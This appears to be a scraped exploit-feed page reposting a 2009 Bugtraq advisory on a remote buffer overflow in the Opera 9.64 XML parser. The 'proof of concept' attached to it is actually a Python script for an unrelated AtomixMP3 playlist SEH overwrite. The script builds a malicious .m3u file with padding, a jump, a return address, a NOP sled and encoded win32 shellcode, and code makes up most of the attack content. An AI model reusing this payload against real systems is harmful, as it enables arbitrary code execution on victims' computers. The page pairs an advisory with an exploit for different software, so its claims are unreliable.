|
Feeds -
Exploits
|
|
Written by Ahmed Obied
|
|
Monday, 30 March 2009 22:21 |
Opera XML Parser Remote Buffer Overflow Vulnerability
-\\Bugtraq ID:
34298
-\\Class:
Boundary Condition Error
-\\CVE:
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Mar 30 2009 12:00AM
-\\Updated:
Mar 30 2009 08:46PM
-\\Credit:
Ahmed Obied
-\\Vulnerable:
Opera Software Opera Web Browser 9.64
-\\Discussion
Opera is prone to a remote buffer-overflow vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of
the user running the browser. Successful exploits will compromise the
application and possibly the computer. Failed attacks will cause denial-
of-service conditions.
Opera 9.64 is vulnerable; other versions may also be affected.
-\\Exploit(s)/PoC(s):
The following proof of concept is available:
===============================================================
34298.py
^^^^^^^^^
#usage: exploit.py
# [+] Bug: AtomixMP3 <= 2.3 (playlist) Universal Seh Overwrite Exploit
# [+] Exploit by : His0k4
# [+] Software download : http://download.atomixmp3.com/atomixmp3_trial.exe
# [+] Greetings : All friends & muslims HackErS (DZ), secdz.com
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://
metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47"
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48"
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44"
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48"
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33"
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37"
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53"
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57"
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59"
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56"
"\x4e\x56\x43\x46\x42\x30\x5a")
payload = "\x41"*740
payload += "\xEB\x06\x90\x90"
payload += "\x52\x1E\xCD\x01" #univ
payload += "\x90"*19
payload += shellcode
try:
out_file = open("exploit.m3u",'w')
out_file.write(payload)
out_file.close()
raw_input("\nExploit file created!\n")
except:
print "Error"
# milw0rm.com [2009-03-30]
-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in
error or if you are aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s)
--Opera Homepage
http://www.opera.com (Opera Software)
|
